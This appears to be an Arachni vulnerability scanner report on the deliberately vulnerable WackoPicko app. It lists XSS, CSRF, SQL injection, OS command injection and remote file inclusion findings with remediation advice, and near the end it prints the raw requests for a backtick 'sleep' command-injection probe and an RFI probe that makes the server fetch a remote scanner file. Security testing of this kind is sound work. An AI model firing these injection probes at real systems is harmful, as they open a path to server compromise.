Summary

Issues by type, trust, and severity

(Click on the bars or line points for details on the relevant issues.)

Severities of issues based on possible impact

(Click to see relevant Trusted issues.)

Elements with issues, by type

 

Trust evaluation (Trusted vs. Untrusted) of issues

(Click to see relevant issues.)

Trusted 64

High severity 17

To perform specific actions from within a web application, it is occasionally required to run Operating System commands and have the output of these commands captured by the web application and returned to the client.

OS command injection occurs when user supplied input is inserted into one of these commands without proper sanitisation and is then executed by the server.

Cyber-criminals will abuse this weakness to perform their own arbitrary commands on the server. This can include everything from simple ping commands to map the internal network, to obtaining full control of the server.

By injecting OS commands that take a specific amount of time to execute, Arachni was able to detect time based OS command injection. This indicates that proper input sanitisation is not occurring.

Vector type Input name HTTP method Action
form password POST http://192.168.0.26/WackoPicko/passcheck.php

Web applications occasionally use parameter values to store the location of a file which will later be required by the server.

An example of this is often seen in error pages, where the actual file path for the error page is stored in a parameter value – for example example.com/error.php?page=404.php.

A remote file inclusion occurs when the parameter value (ie. path to file being called by the server) can be substituted with the address of remote resource – for example: yoursite.com/error.asp?page=http://anothersite.com/somethingBad.php

In some cases, the server will process the fetched resource; therefore, if the resource contains server-side code matching that of the framework being used (ASP, PHP, JSP, etc.), it is probable that the resource will be executed as if it were part of the web application.

Arachni discovered that it was possible to substitute a parameter value with an external resource and have the server fetch it and include its contents in the response.

Vector type Input name HTTP method Action
link page GET http://192.168.0.26/WackoPicko/admin/index.php

Client-side scripts are used extensively by modern web applications. They perform from simple functions (such as the formatting of text) up to full manipulation of client-side data and Operating System interaction.

Cross Site Scripting (XSS) allows clients to inject scripts into a request and have the server return the script to the client in the response. This occurs because the application is taking untrusted data (in this example, from the client) and reusing it without performing any validation or sanitisation.

If the injected script is returned immediately this is known as reflected XSS. If the injected script is stored by the server and returned to any client visiting the affected page, then this is known as persistent XSS (also stored XSS).

Arachni has discovered that it is possible to insert script content directly into HTML element content.

Vector type Input name HTTP method Action
form query GET http://192.168.0.26/WackoPicko/pictures/search.php
form name POST http://192.168.0.26/WackoPicko/piccheck.php
form username POST http://192.168.0.26/WackoPicko/users/login.php
form comment POST http://192.168.0.26/WackoPicko/guestbook.php
form name POST http://192.168.0.26/WackoPicko/guestbook.php
cookie PHPSESSID GET http://192.168.0.26/WackoPicko/guestbook.php
cookie PHPSESSID GET http://192.168.0.26/WackoPicko/guestbook/

Client-side scripts are used extensively by modern web applications. They perform from simple functions (such as the formatting of text) up to full manipulation of client-side data and Operating System interaction.

Cross Site Scripting (XSS) allows clients to inject scripts into a request and have the server return the script to the client in the response. This occurs because the application is taking untrusted data (in this example, from the client) and reusing it without performing any validation or sanitisation.

If the injected script is returned immediately this is known as reflected XSS. If the injected script is stored by the server and returned to any client visiting the affected page, then this is known as persistent XSS (also stored XSS).

Arachni has discovered that it is possible to force the page to execute custom JavaScript code.

Vector type Input name HTTP method Action
form query GET http://192.168.0.26/WackoPicko/pictures/search.php
form name GET http://192.168.0.26/WackoPicko/piccheck.php
cookie PHPSESSID GET http://192.168.0.26/WackoPicko/guestbook/
form comment POST http://192.168.0.26/WackoPicko/guestbook.php
form name POST http://192.168.0.26/WackoPicko/guestbook.php

In the majority of today’s web applications, clients are required to submit forms which can perform sensitive operations.

An example of such a form being used would be when an administrator wishes to create a new user for the application.

In the simplest version of the form, the administrator would fill-in:

  • Name
  • Password
  • Role (level of access)

Continuing with this example, Cross Site Request Forgery (CSRF) would occur when the administrator is tricked into clicking on a link, which if logged into the application, would automatically submit the form without any further interaction.

Cyber-criminals will look for sites where sensitive functions are performed in this manner and then craft malicious requests that will be used against clients via a social engineering attack.

There are 3 things that are required for a CSRF attack to occur:

  1. The form must perform some sort of sensitive action.
  2. The victim (the administrator the example above) must have an active session.
  3. Most importantly, all parameter values must be known or guessable.

Arachni discovered that all parameters within the form were known or predictable and therefore the form could be vulnerable to CSRF.

Manual verification may be required to check whether the submission will then perform a sensitive action, such as reset a password, modify user profiles, post content on a forum, etc.

Vector type HTTP method Action
form GET http://192.168.0.26/WackoPicko/piccheck.php
form GET http://192.168.0.26/WackoPicko/guestbook.php

Due to the requirement for dynamic content of today’s web applications, many rely on a database backend to store data that will be called upon and processed by the web application (or other programs). Web applications retrieve data from the database by using Structured Query Language (SQL) queries.

To meet demands of many developers, database servers (such as MSSQL, MySQL, Oracle etc.) have additional built-in functionality that can allow extensive control of the database and interaction with the host operating system itself.

An SQL injection occurs when a value originating from the client’s request is used within a SQL query without prior sanitisation. This could allow cyber-criminals to execute arbitrary SQL code and steal data or use the additional functionality of the database server to take control of more server components.

The successful exploitation of a SQL injection can be devastating to an organisation and is one of the most commonly exploited web application vulnerabilities.

This injection was detected as Arachni was able to cause the server to respond to the request with a database related error.

Vector type Input name HTTP method Action
form username POST http://192.168.0.26/WackoPicko/users/login.php

Medium severity 13

The TRACE HTTP method allows a client so send a request to the server, and have the same request then send back in the server’s response. This allows the client to determine if the server is receiving the request as expected or if specific parts of the request are not arriving as expected. For example incorrect encoding or a load balancer has filtered or changed a value. On many default installations the TRACE method is still enabled.

While not vulnerable by itself, it does provide a method for cyber-criminals to bypass the HTTPOnly cookie flag, and therefore could allow a XSS attack to successfully access a session token.

Arachni has discovered that the affected page permits the HTTP TRACE method.

Vector type HTTP method Action
server TRACE http://192.168.0.26/WackoPicko/

The HTTP protocol by itself is clear text, meaning that any data that is transmitted via HTTP can be captured and the contents viewed.

To keep data private, and prevent it from being intercepted, HTTP is often tunnelled through either Secure Sockets Layer (SSL), or Transport Layer Security (TLS). When either of these encryption standards are used it is referred to as HTTPS.

Cyber-criminals will often attempt to compromise credentials passed from the client to the server using HTTP. This can be conducted via various different Man-in-The-Middle (MiTM) attacks or through network packet captures.

Arachni discovered that the affected page contains a password input, however, the value of the field is not sent to the server utilising HTTPS. Therefore it is possible that any submitted credential may become compromised.

Vector type HTTP method Action
form GET http://192.168.0.26/WackoPicko/users/register.php
form GET http://192.168.0.26/WackoPicko/users/register.php
form GET http://192.168.0.26/WackoPicko/users/login.php
form GET http://192.168.0.26/WackoPicko/passcheck.php
form GET http://192.168.0.26/WackoPicko/admin/index.php?page=login

Web applications are often made up of multiple files and directories.

It is possible that over time some directories may become unreferenced (unused) by the web application and forgotten about by the administrator/developer. Because web applications are built using common frameworks, they contain common directories that can be discovered (independent of server).

During the initial recon stages of an attack, cyber-criminals will attempt to locate unreferenced directories in the hope that the directory will assist in further compromise of the web application. To achieve this they will make thousands of requests using word lists containing common names. The response headers from the server will then indicate if the directory exists.

Arachni also contains a list of common directory names which it will attempt to access.

Vector type HTTP method Action
server GET http://192.168.0.26/WackoPicko/upload/testing/
server GET http://192.168.0.26/WackoPicko/guestbook/
server GET http://192.168.0.26/WackoPicko/upload/
server GET http://192.168.0.26/WackoPicko/css/blueprint/src/
server GET http://192.168.0.26/WackoPicko/test/
server GET http://192.168.0.26/WackoPicko/users/
server GET http://192.168.0.26/WackoPicko/css/

Low severity 6

An administration interface was identified and should be reviewed.

Vector type HTTP method Action
server GET http://192.168.0.26/WackoPicko/users/

In typical form-based web applications, it is common practice for developers to allow autocomplete within the HTML form to improve the usability of the page. With autocomplete enabled (default), the browser is allowed to cache previously entered form values.

For legitimate purposes, this allows the user to quickly re-enter the same data when completing the form multiple times.

When autocomplete is enabled on either/both the username and password fields, this could allow a cyber-criminal with access to the victim’s computer the ability to have the victim’s credentials automatically entered as the cyber-criminal visits the affected page.

Arachni has discovered that the affected page contains a form containing a password field that has not disabled autocomplete.

Vector type HTTP method Action
form GET http://192.168.0.26/WackoPicko/admin/index.php?page=login
form GET http://192.168.0.26/WackoPicko/passcheck.php
form GET http://192.168.0.26/WackoPicko/users/register.php
form GET http://192.168.0.26/WackoPicko/users/login.php

Clickjacking (User Interface redress attack, UI redress attack, UI redressing) is a malicious technique of tricking a Web user into clicking on something different from what the user perceives they are clicking on, thus potentially revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages.

The server didn’t return an X-Frame-Options header which means that this website could be at risk of a clickjacking attack.

The X-Frame-Options HTTP response header can be used to indicate whether or not a browser should be allowed to render a page inside a frame or iframe. Sites can use this to avoid clickjacking attacks, by ensuring that their content is not embedded into other sites.

Vector type HTTP method Action
server GET http://192.168.0.26/WackoPicko/

Informational severity 28

The server responded with a non 200 (OK) nor 404 (Not Found) status code. This is a non-issue, however exotic HTTP response status codes can provide useful insights into the behavior of the web application and assist with the penetration test.

Vector type HTTP method Action
server GET http://192.168.0.26/WackoPicko/users/.svn/all-wcprops
server PUT http://192.168.0.26/WackoPicko/css/blueprint/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec
server GET http://192.168.0.26/WackoPicko/css/blueprint/.svn/wc.db
server GET http://192.168.0.26/WackoPicko/users/.svn/wc.db
server GET http://192.168.0.26/WackoPicko/upload/3/.svn/all-wcprops
server GET http://192.168.0.26/WackoPicko/upload/3/.svn/wc.db
server GET http://192.168.0.26/WackoPicko/pictures/.svn/all-wcprops
server GET http://192.168.0.26/WackoPicko/pictures/.svn/wc.db
server PUT http://192.168.0.26/WackoPicko/pictures/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec
server PUT http://192.168.0.26/WackoPicko/users/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec
server GET http://192.168.0.26/WackoPicko/css/blueprint/.svn/all-wcprops
server PUT http://192.168.0.26/WackoPicko/upload/3/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec
server PUT http://192.168.0.26/WackoPicko/upload/testing/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec
server GET http://192.168.0.26/WackoPicko/admin/.svn/all-wcprops
server GET http://192.168.0.26/WackoPicko/admin/.svn/wc.db
server PUT http://192.168.0.26/WackoPicko/upload/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec
server GET http://192.168.0.26/WackoPicko/upload/.svn/wc.db
server GET http://192.168.0.26/WackoPicko/upload/.svn/all-wcprops
server GET http://192.168.0.26/WackoPicko/upload/testing/.svn/wc.db
server PUT http://192.168.0.26/WackoPicko/css/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec
server GET http://192.168.0.26/WackoPicko/css/.svn/wc.db
server GET http://192.168.0.26/WackoPicko/.svn/all-wcprops
server GET http://192.168.0.26/WackoPicko/.svn/wc.db
server GET http://192.168.0.26/WackoPicko/css/.svn/all-wcprops
server PUT http://192.168.0.26/WackoPicko/admin/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec

The design of many web applications require that users be able to upload files that will either be stored or processed by the receiving web server.

Arachni has flagged this not as a vulnerability, but as a prompt for the penetration tester to conduct further manual testing on the file upload function.

An insecure form-based file upload could allow a cyber-criminal a means to abuse and successfully exploit the server directly, and/or any third party that may later access the file. This can occur through uploading a file containing server side-code (such as PHP) that is then executed when requested by the client.

Vector type HTTP method Action
form GET http://192.168.0.26/WackoPicko/piccheck.php

Logs the existence of HTML object tags. Since Arachni can’t execute things like Java Applets and Flash this serves as a heads-up to the penetration tester to review the objects in question using a different method.

Vector type HTTP method Action
body POST http://192.168.0.26/WackoPicko/users/home.php

HTTP by itself is a stateless protocol. Therefore the server is unable to determine which requests are performed by which client, and which clients are authenticated or unauthenticated.

The use of HTTP cookies within the headers, allows a web server to identify each individual client and can therefore determine which clients hold valid authentication, from those that do not. These are known as session cookies.

When a cookie is set by the server (sent the header of an HTTP response) there are several flags that can be set to configure the properties of the cookie and how it is to be handled by the browser.

The HttpOnly flag assists in the prevention of client side-scripts (such as JavaScript) accessing and using the cookie.

This can help prevent XSS attacks targeting the cookies holding the client’s session token (setting the HttpOnly flag does not prevent, nor safeguard against XSS vulnerabilities themselves).

Vector type HTTP method Action
cookie GET http://192.168.0.26/WackoPicko/

Untrusted 3

Medium severity 3

Web applications are often made up of multiple files and directories.

It is possible that over time some directories may become unreferenced (unused) by the web application and forgotten about by the administrator/developer. Because web applications are built using common frameworks, they contain common directories that can be discovered (independent of server).

During the initial recon stages of an attack, cyber-criminals will attempt to locate unreferenced directories in the hope that the directory will assist in further compromise of the web application. To achieve this they will make thousands of requests using word lists containing common names. The response headers from the server will then indicate if the directory exists.

Arachni also contains a list of common directory names which it will attempt to access.

Vector type HTTP method Action
server GET http://192.168.0.26/WackoPicko/users/login/
server GET http://192.168.0.26/WackoPicko/error.php?msg=Error,%20need%20to%20provide%20a%20query%20to%20search
server GET http://192.168.0.26/WackoPicko/users/login.php

(About the OWASP Top 10 list)

A1-Injection 2

Injection flaws, such as SQL, OS, and LDAP injection occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization. OWASP

To perform specific actions from within a web application, it is occasionally required to run Operating System commands and have the output of these commands captured by the web application and returned to the client.

OS command injection occurs when user supplied input is inserted into one of these commands without proper sanitisation and is then executed by the server.

Cyber-criminals will abuse this weakness to perform their own arbitrary commands on the server. This can include everything from simple ping commands to map the internal network, to obtaining full control of the server.

By injecting OS commands that take a specific amount of time to execute, Arachni was able to detect time based OS command injection. This indicates that proper input sanitisation is not occurring.

Vector type Input name HTTP method Action
form password POST http://192.168.0.26/WackoPicko/passcheck.php

Due to the requirement for dynamic content of today’s web applications, many rely on a database backend to store data that will be called upon and processed by the web application (or other programs). Web applications retrieve data from the database by using Structured Query Language (SQL) queries.

To meet demands of many developers, database servers (such as MSSQL, MySQL, Oracle etc.) have additional built-in functionality that can allow extensive control of the database and interaction with the host operating system itself.

An SQL injection occurs when a value originating from the client’s request is used within a SQL query without prior sanitisation. This could allow cyber-criminals to execute arbitrary SQL code and steal data or use the additional functionality of the database server to take control of more server components.

The successful exploitation of a SQL injection can be devastating to an organisation and is one of the most commonly exploited web application vulnerabilities.

This injection was detected as Arachni was able to cause the server to respond to the request with a database related error.

Vector type Input name HTTP method Action
form username POST http://192.168.0.26/WackoPicko/users/login.php

A3-Cross-Site Scripting (XSS) 12

XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation or escaping. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites. OWASP

Client-side scripts are used extensively by modern web applications. They perform from simple functions (such as the formatting of text) up to full manipulation of client-side data and Operating System interaction.

Cross Site Scripting (XSS) allows clients to inject scripts into a request and have the server return the script to the client in the response. This occurs because the application is taking untrusted data (in this example, from the client) and reusing it without performing any validation or sanitisation.

If the injected script is returned immediately this is known as reflected XSS. If the injected script is stored by the server and returned to any client visiting the affected page, then this is known as persistent XSS (also stored XSS).

Arachni has discovered that it is possible to insert script content directly into HTML element content.

Vector type Input name HTTP method Action
form query GET http://192.168.0.26/WackoPicko/pictures/search.php
form name POST http://192.168.0.26/WackoPicko/piccheck.php
form username POST http://192.168.0.26/WackoPicko/users/login.php
form comment POST http://192.168.0.26/WackoPicko/guestbook.php
form name POST http://192.168.0.26/WackoPicko/guestbook.php
cookie PHPSESSID GET http://192.168.0.26/WackoPicko/guestbook.php
cookie PHPSESSID GET http://192.168.0.26/WackoPicko/guestbook/

Client-side scripts are used extensively by modern web applications. They perform from simple functions (such as the formatting of text) up to full manipulation of client-side data and Operating System interaction.

Cross Site Scripting (XSS) allows clients to inject scripts into a request and have the server return the script to the client in the response. This occurs because the application is taking untrusted data (in this example, from the client) and reusing it without performing any validation or sanitisation.

If the injected script is returned immediately this is known as reflected XSS. If the injected script is stored by the server and returned to any client visiting the affected page, then this is known as persistent XSS (also stored XSS).

Arachni has discovered that it is possible to force the page to execute custom JavaScript code.

Vector type Input name HTTP method Action
form query GET http://192.168.0.26/WackoPicko/pictures/search.php
form name GET http://192.168.0.26/WackoPicko/piccheck.php
cookie PHPSESSID GET http://192.168.0.26/WackoPicko/guestbook/
form comment POST http://192.168.0.26/WackoPicko/guestbook.php
form name POST http://192.168.0.26/WackoPicko/guestbook.php

A5-Security Misconfiguration 1

Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, and platform. Secure settings should be defined, implemented, and maintained, as defaults are often insecure. Additionally, software should be kept up to date. OWASP

The TRACE HTTP method allows a client so send a request to the server, and have the same request then send back in the server’s response. This allows the client to determine if the server is receiving the request as expected or if specific parts of the request are not arriving as expected. For example incorrect encoding or a load balancer has filtered or changed a value. On many default installations the TRACE method is still enabled.

While not vulnerable by itself, it does provide a method for cyber-criminals to bypass the HTTPOnly cookie flag, and therefore could allow a XSS attack to successfully access a session token.

Arachni has discovered that the affected page permits the HTTP TRACE method.

Vector type HTTP method Action
server TRACE http://192.168.0.26/WackoPicko/

A8-Sensitive Data Exposure 2

A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request, including the victim’s session cookie and any other automatically included authentication information, to a vulnerable web application. This allows the attacker to force the victim’s browser to generate requests the vulnerable application thinks are legitimate requests from the victim. OWASP

In the majority of today’s web applications, clients are required to submit forms which can perform sensitive operations.

An example of such a form being used would be when an administrator wishes to create a new user for the application.

In the simplest version of the form, the administrator would fill-in:

  • Name
  • Password
  • Role (level of access)

Continuing with this example, Cross Site Request Forgery (CSRF) would occur when the administrator is tricked into clicking on a link, which if logged into the application, would automatically submit the form without any further interaction.

Cyber-criminals will look for sites where sensitive functions are performed in this manner and then craft malicious requests that will be used against clients via a social engineering attack.

There are 3 things that are required for a CSRF attack to occur:

  1. The form must perform some sort of sensitive action.
  2. The victim (the administrator the example above) must have an active session.
  3. Most importantly, all parameter values must be known or guessable.

Arachni discovered that all parameters within the form were known or predictable and therefore the form could be vulnerable to CSRF.

Manual verification may be required to check whether the submission will then perform a sensitive action, such as reset a password, modify user profiles, post content on a forum, etc.

Vector type HTTP method Action
form GET http://192.168.0.26/WackoPicko/piccheck.php
form GET http://192.168.0.26/WackoPicko/guestbook.php

Configuration Download

Version
1.5.1
Seed
ca890a60d2e09a1de6dc78b0f4d0f8ec
Audit started on
2018-08-06 18:49:34 -0400
Audit finished on
2018-08-06 19:03:08 -0400
Runtime
00:13:34

General

URL
http://192.168.0.26/WackoPicko/
Checks
allowed_methods, backdoors, backup_directories, backup_files, captcha, code_injection, code_injection_php_input_wrapper, code_injection_timing, common_admin_interfaces, common_directories, common_files, cookie_set_for_parent_domain, credit_card, csrf, cvs_svn_users, directory_listing, emails, file_inclusion, form_upload, hsts, htaccess_limit, html_objects, http_only_cookies, http_put, insecure_client_access_policy, insecure_cookies, insecure_cors_policy, insecure_cross_domain_policy_access, insecure_cross_domain_policy_headers, interesting_responses, ldap_injection, localstart_asp, mixed_resource, no_sql_injection, no_sql_injection_differential, origin_spoof_access_restriction_bypass, os_cmd_injection, os_cmd_injection_timing, password_autocomplete, path_traversal, private_ip, response_splitting, rfi, session_fixation, source_code_disclosure, sql_injection, sql_injection_differential, sql_injection_timing, ssn, trainer, unencrypted_password_forms, unvalidated_redirect, unvalidated_redirect_dom, webdav, x_frame_options, xpath_injection, xss, xss_dom, xss_dom_script_context, xss_event, xss_path, xss_script_context, xss_tag, xst, xxe

Datastore

"report_path" "wackopicko-default-config-arachni-report.afr"

Scope

"redundant_path_patterns"
"calendar.php" 0
"dom_depth_limit" 5
"exclude_file_extensions" []
"exclude_path_patterns" ["http://192.168.0.26/WackoPicko/users/logout.php"]
"exclude_content_patterns" []
"include_path_patterns" ["http://192.168.0.26/WackoPicko/", "http://192.168.0.26/WackoPicko/"]
"restrict_paths" []
"extend_paths" []
"url_rewrites" {}

Http

"user_agent" "Arachni/v1.5.1"
"request_timeout" 10000
"request_redirect_limit" 5
"request_concurrency" 20
"request_queue_size" 100
"request_headers" {}
"response_max_size" 500000
"cookies" {}
"authentication_type" "auto"
"authentication_username" "bryce"
"authentication_password" "bryce"

Input

"values" {}
"default_values"
"name" "arachni_name"
"user" "arachni_user"
"usr" "arachni_user"
"pass" "5543!%arachni_secret"
"txt" "arachni_text"
"num" "132"
"amount" "100"
"mail" "arachni@email.gr"
"account" "12"
"id" "1"
"without_defaults" false
"force" false

Browser cluster

"local_storage" {}
"wait_for_elements" {}
"pool_size" 6
"job_timeout" 10
"worker_time_to_live" 100
"ignore_images" false
"screen_width" 1600
"screen_height" 1200

Audit

"parameter_values" true
"exclude_vector_patterns" []
"include_vector_patterns" []
"link_templates" []
"links" true
"forms" true
"cookies" true
"ui_inputs" true
"ui_forms" true
"jsons" true
"xmls" true

Issues

At the time these issues were logged there were no abnormal interferences or anomalous server behavior.
These issues are considered trusted and accurate.

Operating system command injection (timing attack) 1 os_cmd_injection_timing

To perform specific actions from within a web application, it is occasionally required to run Operating System commands and have the output of these commands captured by the web application and returned to the client.

OS command injection occurs when user supplied input is inserted into one of these commands without proper sanitisation and is then executed by the server.

Cyber-criminals will abuse this weakness to perform their own arbitrary commands on the server. This can include everything from simple ping commands to map the internal network, to obtaining full control of the server.

By injecting OS commands that take a specific amount of time to execute, Arachni was able to detect time based OS command injection. This indicates that proper input sanitisation is not occurring.

Remediation guidance

It is recommended that untrusted data is never used to form a command to be executed by the OS.

To validate data, the application should ensure that the supplied value contains only the characters that are required to perform the required action.

For example, where the form field expects an IP address, only numbers and periods should be accepted. Additionally, all control operators (&, &&, |, ||, $, \, #) should be explicitly denied and never accepted as valid input by the server.

System components have attached some insights to this issue.


  • Timing attack
    • Delays (in seconds) used for each phase: 4.0, 7.0, 15.0, 15.0
    • Response times (in seconds) for control requests prior to phases 2, 3, 4: 0.004822, 0.004961, 0.010926
    • Response times (in seconds) for stabilization requests after each phase: 0.010129, 1.00276, 0.004431, 1.003831, 0.006541

Affected platform type belongs to the Operating systems category, identified as Generic Unix family.

Injected seed
` sleep 16`
0
1
2
3
4
5
6
7
8
9
10
<form action="/WackoPicko/passcheck.php" method="POST">
  Password to check:
  <br>
  </br>
  <input type="password" name="password">
  </input>
  <br>
  </br>
  <input type="submit" value="Check!">
  </input>
</form>
Type In Action Default inputs Updated inputs
form http://192.168.0.26/WackoPicko/passcheck.php http://192.168.0.26/WackoPicko/passcheck.php
password
password
` sleep 16`
HTTP request

Raw HTTP request used to retrieve the page.

POST /WackoPicko/passcheck.php HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=d5mejo5kr6efhtf1dlak7b04m1
Content-Length: 28
Content-Type: application/x-www-form-urlencoded

password=%60%20sleep%2016%60
HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)


        
    
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/passcheck.php HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=d5mejo5kr6efhtf1dlak7b04m1

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:55:10 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 910
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   

<div class="column prepend-1 span-24 first last">
<h2>Check your password strength</h2>
<form action="/WackoPicko/passcheck.php" method="POST">
   Password to check: <br>
   <input type="password" name="password" /><br>
   <input type="submit" value="Check!" />
</form>



</div>


       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   

Remote File Inclusion 1 rfi

Web applications occasionally use parameter values to store the location of a file which will later be required by the server.

An example of this is often seen in error pages, where the actual file path for the error page is stored in a parameter value – for example example.com/error.php?page=404.php.

A remote file inclusion occurs when the parameter value (ie. path to file being called by the server) can be substituted with the address of remote resource – for example: yoursite.com/error.asp?page=http://anothersite.com/somethingBad.php

In some cases, the server will process the fetched resource; therefore, if the resource contains server-side code matching that of the framework being used (ASP, PHP, JSP, etc.), it is probable that the resource will be executed as if it were part of the web application.

Arachni discovered that it was possible to substitute a parameter value with an external resource and have the server fetch it and include its contents in the response.

Remediation guidance

It is recommended that untrusted data is never used to form a file location to be included.

To validate data, the application should ensure that the supplied value for a file is permitted. This can be achieved by performing whitelisting on the parameter value, by matching it against a list of permitted files. If the supplied value does not match any value in the whitelist, then the server should redirect to a standard error page.

In some scenarios, where dynamic content is being requested, it may not be possible to perform validation against a list of trusted resources, therefore the list must also become dynamic (updated as the files change), or perform filtering to remove extraneous user input (such as semicolons, periods etc.) and only permit a-z0-9.

It is also advised that sensitive files are not stored within the web root and that the user permissions enforced by the directory are correct.

Injected seed Signature Proof
hTtP://tests.arachni-scanner.com/rfi.md5.txt
705cd559b16e6946826207c2199bd890
705cd559b16e6946826207c2199bd890
0
1
2
<a href="/WackoPicko/admin/index.php?page=login">
  Admin
</a>
Type In Action Default inputs Updated inputs
link http://192.168.0.26/WackoPicko/ http://192.168.0.26/WackoPicko/admin/index.php
page
login
page
hTtP://tests.arachni-scanner.com/rfi.md5.txt
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/admin/index.php?page=hTtP%3A%2F%2Ftests.arachni-scanner.com%2Frfi.md5.txt HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:52 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 53
Content-Type: text/html

705cd559b16e6946826207c2199bd890
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
